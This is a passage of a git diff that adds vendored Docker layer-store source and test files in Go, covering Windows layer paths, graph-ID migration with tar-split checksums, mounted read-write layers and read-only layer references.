expected) + } + + layer2DiffSize, err := graphDiffSize(ls, layer2) + if err != nil { + t.Fatal(err) + } + + if int(layer2DiffSize) != len(content2) { + t.Fatalf("Unexpected diff size %d, expected %d", layer2DiffSize, len(content2)) + } + + layer2Size, err := layer2.Size() + if err != nil { + t.Fatal(err) + } + + if expected := len(content1) + len(content2); int(layer2Size) != expected { + t.Fatalf("Unexpected size %d, expected %d", layer2Size, expected) + } + +} diff --git a/vendor/github.com/docker/docker/layer/layer_windows.go b/vendor/github.com/docker/docker/layer/layer_windows.go new file mode 100644 index 0000000000..e20311a091 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/layer_windows.go @@ -0,0 +1,98 @@ +package layer + +import ( + "errors" + "fmt" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/daemon/graphdriver" +) + +// GetLayerPath returns the path to a layer +func GetLayerPath(s Store, layer ChainID) (string, error) { + ls, ok := s.(*layerStore) + if !ok { + return "", errors.New("unsupported layer store") + } + ls.layerL.Lock() + defer ls.layerL.Unlock() + + rl, ok := ls.layerMap[layer] + if !ok { + return "", ErrLayerDoesNotExist + } + + path, err := ls.driver.Get(rl.cacheID, "") + if err != nil { + return "", err + } + + if err := ls.driver.Put(rl.cacheID); err != nil { + return "", err + } + + return path, nil +} + +func (ls *layerStore) RegisterDiffID(graphID string, size int64) (Layer, error) { + var err error // this is used for cleanup in existingLayer case + diffID := digest.FromBytes([]byte(graphID)) + + // Create new roLayer + layer := &roLayer{ + cacheID: graphID, + diffID: DiffID(diffID), + referenceCount: 1, + layerStore: ls, + references: map[Layer]struct{}{}, + size: size, + } + + tx, err := ls.store.StartTransaction() + if err != nil { + return nil, err + } + defer func() { + if err != nil { + if err := tx.Cancel(); err != nil { + logrus.Errorf("Error canceling 
metadata transaction %q: %s", tx.String(), err) + } + } + }() + + layer.chainID = createChainIDFromParent("", layer.diffID) + + if !ls.driver.Exists(layer.cacheID) { + return nil, fmt.Errorf("layer %q is unknown to driver", layer.cacheID) + } + if err = storeLayer(tx, layer); err != nil { + return nil, err + } + + ls.layerL.Lock() + defer ls.layerL.Unlock() + + if existingLayer := ls.getWithoutLock(layer.chainID); existingLayer != nil { + // Set error for cleanup, but do not return + err = errors.New("layer already exists") + return existingLayer.getReference(), nil + } + + if err = tx.Commit(layer.chainID); err != nil { + return nil, err + } + + ls.layerMap[layer.chainID] = layer + + return layer.getReference(), nil +} + +func (ls *layerStore) mountID(name string) string { + // windows has issues if container ID doesn't match mount ID + return name +} + +func (ls *layerStore) GraphDriver() graphdriver.Driver { + return ls.driver +} diff --git a/vendor/github.com/docker/docker/layer/migration.go b/vendor/github.com/docker/docker/layer/migration.go new file mode 100644 index 0000000000..b45c31099d --- /dev/null +++ b/vendor/github.com/docker/docker/layer/migration.go @@ -0,0 +1,256 @@ +package layer + +import ( + "compress/gzip" + "errors" + "fmt" + "io" + "os" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/vbatts/tar-split/tar/asm" + "github.com/vbatts/tar-split/tar/storage" +) + +// CreateRWLayerByGraphID creates a RWLayer in the layer store using +// the provided name with the given graphID. To get the RWLayer +// after migration the layer may be retrieved by the given name. 
+func (ls *layerStore) CreateRWLayerByGraphID(name string, graphID string, parent ChainID) (err error) { + ls.mountL.Lock() + defer ls.mountL.Unlock() + m, ok := ls.mounts[name] + if ok { + if m.parent.chainID != parent { + return errors.New("name conflict, mismatched parent") + } + if m.mountID != graphID { + return errors.New("mount already exists") + } + + return nil + } + + if !ls.driver.Exists(graphID) { + return fmt.Errorf("graph ID does not exist: %q", graphID) + } + + var p *roLayer + if string(parent) != "" { + p = ls.get(parent) + if p == nil { + return ErrLayerDoesNotExist + } + + // Release parent chain if error + defer func() { + if err != nil { + ls.layerL.Lock() + ls.releaseLayer(p) + ls.layerL.Unlock() + } + }() + } + + // TODO: Ensure graphID has correct parent + + m = &mountedLayer{ + name: name, + parent: p, + mountID: graphID, + layerStore: ls, + references: map[RWLayer]*referencedRWLayer{}, + } + + // Check for existing init layer + initID := fmt.Sprintf("%s-init", graphID) + if ls.driver.Exists(initID) { + m.initID = initID + } + + if err = ls.saveMount(m); err != nil { + return err + } + + return nil +} + +func (ls *layerStore) ChecksumForGraphID(id, parent, oldTarDataPath, newTarDataPath string) (diffID DiffID, size int64, err error) { + defer func() { + if err != nil { + logrus.Debugf("could not get checksum for %q with tar-split: %q", id, err) + diffID, size, err = ls.checksumForGraphIDNoTarsplit(id, parent, newTarDataPath) + } + }() + + if oldTarDataPath == "" { + err = errors.New("no tar-split file") + return + } + + tarDataFile, err := os.Open(oldTarDataPath) + if err != nil { + return + } + defer tarDataFile.Close() + uncompressed, err := gzip.NewReader(tarDataFile) + if err != nil { + return + } + + dgst := digest.Canonical.New() + err = ls.assembleTarTo(id, uncompressed, &size, dgst.Hash()) + if err != nil { + return + } + + diffID = DiffID(dgst.Digest()) + err = os.RemoveAll(newTarDataPath) + if err != nil { + return + } + err = 
os.Link(oldTarDataPath, newTarDataPath) + + return +} + +func (ls *layerStore) checksumForGraphIDNoTarsplit(id, parent, newTarDataPath string) (diffID DiffID, size int64, err error) { + rawarchive, err := ls.driver.Diff(id, parent) + if err != nil { + return + } + defer rawarchive.Close() + + f, err := os.Create(newTarDataPath) + if err != nil { + return + } + defer f.Close() + mfz := gzip.NewWriter(f) + defer mfz.Close() + metaPacker := storage.NewJSONPacker(mfz) + + packerCounter := &packSizeCounter{metaPacker, &size} + + archive, err := asm.NewInputTarStream(rawarchive, packerCounter, nil) + if err != nil { + return + } + dgst, err := digest.FromReader(archive) + if err != nil { + return + } + diffID = DiffID(dgst) + return +} + +func (ls *layerStore) RegisterByGraphID(graphID string, parent ChainID, diffID DiffID, tarDataFile string, size int64) (Layer, error) { + // err is used to hold the error which will always trigger + // cleanup of creates sources but may not be an error returned + // to the caller (already exists). 
+ var err error + var p *roLayer + if string(parent) != "" { + p = ls.get(parent) + if p == nil { + return nil, ErrLayerDoesNotExist + } + + // Release parent chain if error + defer func() { + if err != nil { + ls.layerL.Lock() + ls.releaseLayer(p) + ls.layerL.Unlock() + } + }() + } + + // Create new roLayer + layer := &roLayer{ + parent: p, + cacheID: graphID, + referenceCount: 1, + layerStore: ls, + references: map[Layer]struct{}{}, + diffID: diffID, + size: size, + chainID: createChainIDFromParent(parent, diffID), + } + + ls.layerL.Lock() + defer ls.layerL.Unlock() + + if existingLayer := ls.getWithoutLock(layer.chainID); existingLayer != nil { + // Set error for cleanup, but do not return + err = errors.New("layer already exists") + return existingLayer.getReference(), nil + } + + tx, err := ls.store.StartTransaction() + if err != nil { + return nil, err + } + + defer func() { + if err != nil { + logrus.Debugf("Cleaning up transaction after failed migration for %s: %v", graphID, err) + if err := tx.Cancel(); err != nil { + logrus.Errorf("Error canceling metadata transaction %q: %s", tx.String(), err) + } + } + }() + + tsw, err := tx.TarSplitWriter(false) + if err != nil { + return nil, err + } + defer tsw.Close() + tdf, err := os.Open(tarDataFile) + if err != nil { + return nil, err + } + defer tdf.Close() + _, err = io.Copy(tsw, tdf) + if err != nil { + return nil, err + } + + if err = storeLayer(tx, layer); err != nil { + return nil, err + } + + if err = tx.Commit(layer.chainID); err != nil { + return nil, err + } + + ls.layerMap[layer.chainID] = layer + + return layer.getReference(), nil +} + +type unpackSizeCounter struct { + unpacker storage.Unpacker + size *int64 +} + +func (u *unpackSizeCounter) Next() (*storage.Entry, error) { + e, err := u.unpacker.Next() + if err == nil && u.size != nil { + *u.size += e.Size + } + return e, err +} + +type packSizeCounter struct { + packer storage.Packer + size *int64 +} + +func (p *packSizeCounter) AddEntry(e 
storage.Entry) (int, error) { + n, err := p.packer.AddEntry(e) + if err == nil && p.size != nil { + *p.size += e.Size + } + return n, err +} diff --git a/vendor/github.com/docker/docker/layer/migration_test.go b/vendor/github.com/docker/docker/layer/migration_test.go new file mode 100644 index 0000000000..07b4b68f8f --- /dev/null +++ b/vendor/github.com/docker/docker/layer/migration_test.go @@ -0,0 +1,435 @@ +package layer + +import ( + "bytes" + "compress/gzip" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "runtime" + "testing" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/stringid" + "github.com/vbatts/tar-split/tar/asm" + "github.com/vbatts/tar-split/tar/storage" +) + +func writeTarSplitFile(name string, tarContent []byte) error { + f, err := os.OpenFile(name, os.O_TRUNC|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return err + } + defer f.Close() + + fz := gzip.NewWriter(f) + + metaPacker := storage.NewJSONPacker(fz) + defer fz.Close() + + rdr, err := asm.NewInputTarStream(bytes.NewReader(tarContent), metaPacker, nil) + if err != nil { + return err + } + + if _, err := io.Copy(ioutil.Discard, rdr); err != nil { + return err + } + + return nil +} + +func TestLayerMigration(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + td, err := ioutil.TempDir("", "migration-test-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(td) + + layer1Files := []FileApplier{ + newTestFile("/root/.bashrc", []byte("# Boring configuration"), 0644), + newTestFile("/etc/profile", []byte("# Base configuration"), 0644), + } + + layer2Files := []FileApplier{ + newTestFile("/root/.bashrc", []byte("# Updated configuration"), 0644), + } + + tar1, err := tarFromFiles(layer1Files...) + if err != nil { + t.Fatal(err) + } + + tar2, err := tarFromFiles(layer2Files...) 
+ if err != nil { + t.Fatal(err) + } + + graph, err := newVFSGraphDriver(filepath.Join(td, "graphdriver-")) + if err != nil { + t.Fatal(err) + } + + graphID1 := stringid.GenerateRandomID() + if err := graph.Create(graphID1, "", nil); err != nil { + t.Fatal(err) + } + if _, err := graph.ApplyDiff(graphID1, "", bytes.NewReader(tar1)); err != nil { + t.Fatal(err) + } + + tf1 := filepath.Join(td, "tar1.json.gz") + if err := writeTarSplitFile(tf1, tar1); err != nil { + t.Fatal(err) + } + + fms, err := NewFSMetadataStore(filepath.Join(td, "layers")) + if err != nil { + t.Fatal(err) + } + ls, err := NewStoreFromGraphDriver(fms, graph) + if err != nil { + t.Fatal(err) + } + + newTarDataPath := filepath.Join(td, ".migration-tardata") + diffID, size, err := ls.(*layerStore).ChecksumForGraphID(graphID1, "", tf1, newTarDataPath) + if err != nil { + t.Fatal(err) + } + + layer1a, err := ls.(*layerStore).RegisterByGraphID(graphID1, "", diffID, newTarDataPath, size) + if err != nil { + t.Fatal(err) + } + + layer1b, err := ls.Register(bytes.NewReader(tar1), "") + if err != nil { + t.Fatal(err) + } + + assertReferences(t, layer1a, layer1b) + // Attempt register, should be same + layer2a, err := ls.Register(bytes.NewReader(tar2), layer1a.ChainID()) + if err != nil { + t.Fatal(err) + } + + graphID2 := stringid.GenerateRandomID() + if err := graph.Create(graphID2, graphID1, nil); err != nil { + t.Fatal(err) + } + if _, err := graph.ApplyDiff(graphID2, graphID1, bytes.NewReader(tar2)); err != nil { + t.Fatal(err) + } + + tf2 := filepath.Join(td, "tar2.json.gz") + if err := writeTarSplitFile(tf2, tar2); err != nil { + t.Fatal(err) + } + diffID, size, err = ls.(*layerStore).ChecksumForGraphID(graphID2, graphID1, tf2, newTarDataPath) + if err != nil { + t.Fatal(err) + } + + layer2b, err := ls.(*layerStore).RegisterByGraphID(graphID2, layer1a.ChainID(), diffID, tf2, size) + if err != nil { + t.Fatal(err) + } + assertReferences(t, layer2a, layer2b) + + if metadata, err := 
ls.Release(layer2a); err != nil { + t.Fatal(err) + } else if len(metadata) > 0 { + t.Fatalf("Unexpected layer removal after first release: %#v", metadata) + } + + metadata, err := ls.Release(layer2b) + if err != nil { + t.Fatal(err) + } + + assertMetadata(t, metadata, createMetadata(layer2a)) +} + +func tarFromFilesInGraph(graph graphdriver.Driver, graphID, parentID string, files ...FileApplier) ([]byte, error) { + t, err := tarFromFiles(files...) + if err != nil { + return nil, err + } + + if err := graph.Create(graphID, parentID, nil); err != nil { + return nil, err + } + if _, err := graph.ApplyDiff(graphID, parentID, bytes.NewReader(t)); err != nil { + return nil, err + } + + ar, err := graph.Diff(graphID, parentID) + if err != nil { + return nil, err + } + defer ar.Close() + + return ioutil.ReadAll(ar) +} + +func TestLayerMigrationNoTarsplit(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + td, err := ioutil.TempDir("", "migration-test-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(td) + + layer1Files := []FileApplier{ + newTestFile("/root/.bashrc", []byte("# Boring configuration"), 0644), + newTestFile("/etc/profile", []byte("# Base configuration"), 0644), + } + + layer2Files := []FileApplier{ + newTestFile("/root/.bashrc", []byte("# Updated configuration"), 0644), + } + + graph, err := newVFSGraphDriver(filepath.Join(td, "graphdriver-")) + if err != nil { + t.Fatal(err) + } + graphID1 := stringid.GenerateRandomID() + graphID2 := stringid.GenerateRandomID() + + tar1, err := tarFromFilesInGraph(graph, graphID1, "", layer1Files...) + if err != nil { + t.Fatal(err) + } + + tar2, err := tarFromFilesInGraph(graph, graphID2, graphID1, layer2Files...) 
+ if err != nil { + t.Fatal(err) + } + + fms, err := NewFSMetadataStore(filepath.Join(td, "layers")) + if err != nil { + t.Fatal(err) + } + ls, err := NewStoreFromGraphDriver(fms, graph) + if err != nil { + t.Fatal(err) + } + + newTarDataPath := filepath.Join(td, ".migration-tardata") + diffID, size, err := ls.(*layerStore).ChecksumForGraphID(graphID1, "", "", newTarDataPath) + if err != nil { + t.Fatal(err) + } + + layer1a, err := ls.(*layerStore).RegisterByGraphID(graphID1, "", diffID, newTarDataPath, size) + if err != nil { + t.Fatal(err) + } + + layer1b, err := ls.Register(bytes.NewReader(tar1), "") + if err != nil { + t.Fatal(err) + } + + assertReferences(t, layer1a, layer1b) + + // Attempt register, should be same + layer2a, err := ls.Register(bytes.NewReader(tar2), layer1a.ChainID()) + if err != nil { + t.Fatal(err) + } + + diffID, size, err = ls.(*layerStore).ChecksumForGraphID(graphID2, graphID1, "", newTarDataPath) + if err != nil { + t.Fatal(err) + } + + layer2b, err := ls.(*layerStore).RegisterByGraphID(graphID2, layer1a.ChainID(), diffID, newTarDataPath, size) + if err != nil { + t.Fatal(err) + } + assertReferences(t, layer2a, layer2b) + + if metadata, err := ls.Release(layer2a); err != nil { + t.Fatal(err) + } else if len(metadata) > 0 { + t.Fatalf("Unexpected layer removal after first release: %#v", metadata) + } + + metadata, err := ls.Release(layer2b) + if err != nil { + t.Fatal(err) + } + + assertMetadata(t, metadata, createMetadata(layer2a)) +} + +func TestMountMigration(t *testing.T) { + // TODO Windows: Figure out why this is failing (obvious - paths... 
needs porting) + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + ls, _, cleanup := newTestStore(t) + defer cleanup() + + baseFiles := []FileApplier{ + newTestFile("/root/.bashrc", []byte("# Boring configuration"), 0644), + newTestFile("/etc/profile", []byte("# Base configuration"), 0644), + } + initFiles := []FileApplier{ + newTestFile("/etc/hosts", []byte{}, 0644), + newTestFile("/etc/resolv.conf", []byte{}, 0644), + } + mountFiles := []FileApplier{ + newTestFile("/etc/hosts", []byte("localhost 127.0.0.1"), 0644), + newTestFile("/root/.bashrc", []byte("# Updated configuration"), 0644), + newTestFile("/root/testfile1.txt", []byte("nothing valuable"), 0644), + } + + initTar, err := tarFromFiles(initFiles...) + if err != nil { + t.Fatal(err) + } + + mountTar, err := tarFromFiles(mountFiles...) + if err != nil { + t.Fatal(err) + } + + graph := ls.(*layerStore).driver + + layer1, err := createLayer(ls, "", initWithFiles(baseFiles...)) + if err != nil { + t.Fatal(err) + } + + graphID1 := layer1.(*referencedCacheLayer).cacheID + + containerID := stringid.GenerateRandomID() + containerInit := fmt.Sprintf("%s-init", containerID) + + if err := graph.Create(containerInit, graphID1, nil); err != nil { + t.Fatal(err) + } + if _, err := graph.ApplyDiff(containerInit, graphID1, bytes.NewReader(initTar)); err != nil { + t.Fatal(err) + } + + if err := graph.Create(containerID, containerInit, nil); err != nil { + t.Fatal(err) + } + if _, err := graph.ApplyDiff(containerID, containerInit, bytes.NewReader(mountTar)); err != nil { + t.Fatal(err) + } + + if err := ls.(*layerStore).CreateRWLayerByGraphID("migration-mount", containerID, layer1.ChainID()); err != nil { + t.Fatal(err) + } + + rwLayer1, err := ls.GetRWLayer("migration-mount") + if err != nil { + t.Fatal(err) + } + + if _, err := rwLayer1.Mount(""); err != nil { + t.Fatal(err) + } + + changes, err := rwLayer1.Changes() + if err != nil { + t.Fatal(err) + } + + if expected := 5; len(changes) != expected { + 
t.Logf("Changes %#v", changes) + t.Fatalf("Wrong number of changes %d, expected %d", len(changes), expected) + } + + sortChanges(changes) + + assertChange(t, changes[0], archive.Change{ + Path: "/etc", + Kind: archive.ChangeModify, + }) + assertChange(t, changes[1], archive.Change{ + Path: "/etc/hosts", + Kind: archive.ChangeModify, + }) + assertChange(t, changes[2], archive.Change{ + Path: "/root", + Kind: archive.ChangeModify, + }) + assertChange(t, changes[3], archive.Change{ + Path: "/root/.bashrc", + Kind: archive.ChangeModify, + }) + assertChange(t, changes[4], archive.Change{ + Path: "/root/testfile1.txt", + Kind: archive.ChangeAdd, + }) + + if _, err := ls.CreateRWLayer("migration-mount", layer1.ChainID(), "", nil, nil); err == nil { + t.Fatal("Expected error creating mount with same name") + } else if err != ErrMountNameConflict { + t.Fatal(err) + } + + rwLayer2, err := ls.GetRWLayer("migration-mount") + if err != nil { + t.Fatal(err) + } + + if getMountLayer(rwLayer1) != getMountLayer(rwLayer2) { + t.Fatal("Expected same layer from get with same name as from migrate") + } + + if _, err := rwLayer2.Mount(""); err != nil { + t.Fatal(err) + } + + if _, err := rwLayer2.Mount(""); err != nil { + t.Fatal(err) + } + + if metadata, err := ls.Release(layer1); err != nil { + t.Fatal(err) + } else if len(metadata) > 0 { + t.Fatalf("Expected no layers to be deleted, deleted %#v", metadata) + } + + if err := rwLayer1.Unmount(); err != nil { + t.Fatal(err) + } + + if _, err := ls.ReleaseRWLayer(rwLayer1); err != nil { + t.Fatal(err) + } + + if err := rwLayer2.Unmount(); err != nil { + t.Fatal(err) + } + if err := rwLayer2.Unmount(); err != nil { + t.Fatal(err) + } + metadata, err := ls.ReleaseRWLayer(rwLayer2) + if err != nil { + t.Fatal(err) + } + if len(metadata) == 0 { + t.Fatal("Expected base layer to be deleted when deleting mount") + } + + assertMetadata(t, metadata, createMetadata(layer1)) +} diff --git a/vendor/github.com/docker/docker/layer/mount_test.go 
b/vendor/github.com/docker/docker/layer/mount_test.go new file mode 100644 index 0000000000..7a8637eae9 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/mount_test.go @@ -0,0 +1,230 @@ +package layer + +import ( + "io/ioutil" + "os" + "path/filepath" + "runtime" + "sort" + "testing" + + "github.com/docker/docker/pkg/archive" +) + +func TestMountInit(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + ls, _, cleanup := newTestStore(t) + defer cleanup() + + basefile := newTestFile("testfile.txt", []byte("base data!"), 0644) + initfile := newTestFile("testfile.txt", []byte("init data!"), 0777) + + li := initWithFiles(basefile) + layer, err := createLayer(ls, "", li) + if err != nil { + t.Fatal(err) + } + + mountInit := func(root string) error { + return initfile.ApplyFile(root) + } + + m, err := ls.CreateRWLayer("fun-mount", layer.ChainID(), "", mountInit, nil) + if err != nil { + t.Fatal(err) + } + + path, err := m.Mount("") + if err != nil { + t.Fatal(err) + } + + f, err := os.Open(filepath.Join(path, "testfile.txt")) + if err != nil { + t.Fatal(err) + } + defer f.Close() + + fi, err := f.Stat() + if err != nil { + t.Fatal(err) + } + + b, err := ioutil.ReadAll(f) + if err != nil { + t.Fatal(err) + } + + if expected := "init data!"; string(b) != expected { + t.Fatalf("Unexpected test file contents %q, expected %q", string(b), expected) + } + + if fi.Mode().Perm() != 0777 { + t.Fatalf("Unexpected filemode %o, expecting %o", fi.Mode().Perm(), 0777) + } +} + +func TestMountSize(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + ls, _, cleanup := newTestStore(t) + defer cleanup() + + content1 := []byte("Base contents") + content2 := []byte("Mutable contents") + contentInit := []byte("why am I excluded from the size ☹") + + li := initWithFiles(newTestFile("file1", content1, 0644)) + layer, err := 
createLayer(ls, "", li) + if err != nil { + t.Fatal(err) + } + + mountInit := func(root string) error { + return newTestFile("file-init", contentInit, 0777).ApplyFile(root) + } + + m, err := ls.CreateRWLayer("mount-size", layer.ChainID(), "", mountInit, nil) + if err != nil { + t.Fatal(err) + } + + path, err := m.Mount("") + if err != nil { + t.Fatal(err) + } + + if err := ioutil.WriteFile(filepath.Join(path, "file2"), content2, 0755); err != nil { + t.Fatal(err) + } + + mountSize, err := m.Size() + if err != nil { + t.Fatal(err) + } + + if expected := len(content2); int(mountSize) != expected { + t.Fatalf("Unexpected mount size %d, expected %d", int(mountSize), expected) + } +} + +func TestMountChanges(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + ls, _, cleanup := newTestStore(t) + defer cleanup() + + basefiles := []FileApplier{ + newTestFile("testfile1.txt", []byte("base data!"), 0644), + newTestFile("testfile2.txt", []byte("base data!"), 0644), + newTestFile("testfile3.txt", []byte("base data!"), 0644), + } + initfile := newTestFile("testfile1.txt", []byte("init data!"), 0777) + + li := initWithFiles(basefiles...) 
+ layer, err := createLayer(ls, "", li) + if err != nil { + t.Fatal(err) + } + + mountInit := func(root string) error { + return initfile.ApplyFile(root) + } + + m, err := ls.CreateRWLayer("mount-changes", layer.ChainID(), "", mountInit, nil) + if err != nil { + t.Fatal(err) + } + + path, err := m.Mount("") + if err != nil { + t.Fatal(err) + } + + if err := os.Chmod(filepath.Join(path, "testfile1.txt"), 0755); err != nil { + t.Fatal(err) + } + + if err := ioutil.WriteFile(filepath.Join(path, "testfile1.txt"), []byte("mount data!"), 0755); err != nil { + t.Fatal(err) + } + + if err := os.Remove(filepath.Join(path, "testfile2.txt")); err != nil { + t.Fatal(err) + } + + if err := os.Chmod(filepath.Join(path, "testfile3.txt"), 0755); err != nil { + t.Fatal(err) + } + + if err := ioutil.WriteFile(filepath.Join(path, "testfile4.txt"), []byte("mount data!"), 0644); err != nil { + t.Fatal(err) + } + + changes, err := m.Changes() + if err != nil { + t.Fatal(err) + } + + if expected := 4; len(changes) != expected { + t.Fatalf("Wrong number of changes %d, expected %d", len(changes), expected) + } + + sortChanges(changes) + + assertChange(t, changes[0], archive.Change{ + Path: "/testfile1.txt", + Kind: archive.ChangeModify, + }) + assertChange(t, changes[1], archive.Change{ + Path: "/testfile2.txt", + Kind: archive.ChangeDelete, + }) + assertChange(t, changes[2], archive.Change{ + Path: "/testfile3.txt", + Kind: archive.ChangeModify, + }) + assertChange(t, changes[3], archive.Change{ + Path: "/testfile4.txt", + Kind: archive.ChangeAdd, + }) +} + +func assertChange(t *testing.T, actual, expected archive.Change) { + if actual.Path != expected.Path { + t.Fatalf("Unexpected change path %s, expected %s", actual.Path, expected.Path) + } + if actual.Kind != expected.Kind { + t.Fatalf("Unexpected change type %s, expected %s", actual.Kind, expected.Kind) + } +} + +func sortChanges(changes []archive.Change) { + cs := &changeSorter{ + changes: changes, + } + sort.Sort(cs) +} + +type 
changeSorter struct { + changes []archive.Change +} + +func (cs *changeSorter) Len() int { + return len(cs.changes) +} + +func (cs *changeSorter) Swap(i, j int) { + cs.changes[i], cs.changes[j] = cs.changes[j], cs.changes[i] +} + +func (cs *changeSorter) Less(i, j int) bool { + return cs.changes[i].Path < cs.changes[j].Path +} diff --git a/vendor/github.com/docker/docker/layer/mounted_layer.go b/vendor/github.com/docker/docker/layer/mounted_layer.go new file mode 100644 index 0000000000..a5cfcfa9bd --- /dev/null +++ b/vendor/github.com/docker/docker/layer/mounted_layer.go @@ -0,0 +1,99 @@ +package layer + +import ( + "io" + + "github.com/docker/docker/pkg/archive" +) + +type mountedLayer struct { + name string + mountID string + initID string + parent *roLayer + path string + layerStore *layerStore + + references map[RWLayer]*referencedRWLayer +} + +func (ml *mountedLayer) cacheParent() string { + if ml.initID != "" { + return ml.initID + } + if ml.parent != nil { + return ml.parent.cacheID + } + return "" +} + +func (ml *mountedLayer) TarStream() (io.ReadCloser, error) { + return ml.layerStore.driver.Diff(ml.mountID, ml.cacheParent()) +} + +func (ml *mountedLayer) Name() string { + return ml.name +} + +func (ml *mountedLayer) Parent() Layer { + if ml.parent != nil { + return ml.parent + } + + // Return a nil interface instead of an interface wrapping a nil + // pointer. 
+ return nil +} + +func (ml *mountedLayer) Size() (int64, error) { + return ml.layerStore.driver.DiffSize(ml.mountID, ml.cacheParent()) +} + +func (ml *mountedLayer) Changes() ([]archive.Change, error) { + return ml.layerStore.driver.Changes(ml.mountID, ml.cacheParent()) +} + +func (ml *mountedLayer) Metadata() (map[string]string, error) { + return ml.layerStore.driver.GetMetadata(ml.mountID) +} + +func (ml *mountedLayer) getReference() RWLayer { + ref := &referencedRWLayer{ + mountedLayer: ml, + } + ml.references[ref] = ref + + return ref +} + +func (ml *mountedLayer) hasReferences() bool { + return len(ml.references) > 0 +} + +func (ml *mountedLayer) deleteReference(ref RWLayer) error { + if _, ok := ml.references[ref]; !ok { + return ErrLayerNotRetained + } + delete(ml.references, ref) + return nil +} + +func (ml *mountedLayer) retakeReference(r RWLayer) { + if ref, ok := r.(*referencedRWLayer); ok { + ml.references[ref] = ref + } +} + +type referencedRWLayer struct { + *mountedLayer +} + +func (rl *referencedRWLayer) Mount(mountLabel string) (string, error) { + return rl.layerStore.driver.Get(rl.mountedLayer.mountID, mountLabel) +} + +// Unmount decrements the activity count and unmounts the underlying layer +// Callers should only call `Unmount` once per call to `Mount`, even on error. 
+func (rl *referencedRWLayer) Unmount() error { + return rl.layerStore.driver.Put(rl.mountedLayer.mountID) +} diff --git a/vendor/github.com/docker/docker/layer/ro_layer.go b/vendor/github.com/docker/docker/layer/ro_layer.go new file mode 100644 index 0000000000..7c8d233a35 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/ro_layer.go @@ -0,0 +1,192 @@ +package layer + +import ( + "fmt" + "io" + + "github.com/docker/distribution" + "github.com/docker/distribution/digest" +) + +type roLayer struct { + chainID ChainID + diffID DiffID + parent *roLayer + cacheID string + size int64 + layerStore *layerStore + descriptor distribution.Descriptor + + referenceCount int + references map[Layer]struct{} +} + +// TarStream for roLayer guarentees that the data that is produced is the exact +// data that the layer was registered with. +func (rl *roLayer) TarStream() (io.ReadCloser, error) { + r, err := rl.layerStore.store.TarSplitReader(rl.chainID) + if err != nil { + return nil, err + } + + pr, pw := io.Pipe() + go func() { + err := rl.layerStore.assembleTarTo(rl.cacheID, r, nil, pw) + if err != nil { + pw.CloseWithError(err) + } else { + pw.Close() + } + }() + rc, err := newVerifiedReadCloser(pr, digest.Digest(rl.diffID)) + if err != nil { + return nil, err + } + return rc, nil +} + +// TarStreamFrom does not make any guarentees to the correctness of the produced +// data. As such it should not be used when the layer content must be verified +// to be an exact match to the registered layer. 
+func (rl *roLayer) TarStreamFrom(parent ChainID) (io.ReadCloser, error) { + var parentCacheID string + for pl := rl.parent; pl != nil; pl = pl.parent { + if pl.chainID == parent { + parentCacheID = pl.cacheID + break + } + } + + if parent != ChainID("") && parentCacheID == "" { + return nil, fmt.Errorf("layer ID '%s' is not a parent of the specified layer: cannot provide diff to non-parent", parent) + } + return rl.layerStore.driver.Diff(rl.cacheID, parentCacheID) +} + +func (rl *roLayer) ChainID() ChainID { + return rl.chainID +} + +func (rl *roLayer) DiffID() DiffID { + return rl.diffID +} + +func (rl *roLayer) Parent() Layer { + if rl.parent == nil { + return nil + } + return rl.parent +} + +func (rl *roLayer) Size() (size int64, err error) { + if rl.parent != nil { + size, err = rl.parent.Size() + if err != nil { + return + } + } + + return size + rl.size, nil +} + +func (rl *roLayer) DiffSize() (size int64, err error) { + return rl.size, nil +} + +func (rl *roLayer) Metadata() (map[string]string, error) { + return rl.layerStore.driver.GetMetadata(rl.cacheID) +} + +type referencedCacheLayer struct { + *roLayer +} + +func (rl *roLayer) getReference() Layer { + ref := &referencedCacheLayer{ + roLayer: rl, + } + rl.references[ref] = struct{}{} + + return ref +} + +func (rl *roLayer) hasReference(ref Layer) bool { + _, ok := rl.references[ref] + return ok +} + +func (rl *roLayer) hasReferences() bool { + return len(rl.references) > 0 +} + +func (rl *roLayer) deleteReference(ref Layer) { + delete(rl.references, ref) +} + +func (rl *roLayer) depth() int { + if rl.parent == nil { + return 1 + } + return rl.parent.depth() + 1 +} + +func storeLayer(tx MetadataTransaction, layer *roLayer) error { + if err := tx.SetDiffID(layer.diffID); err != nil { + return err + } + if err := tx.SetSize(layer.size); err != nil { + return err + } + if err := tx.SetCacheID(layer.cacheID); err != nil { + return err + } + // Do not store empty descriptors + if layer.descriptor.Digest != "" 
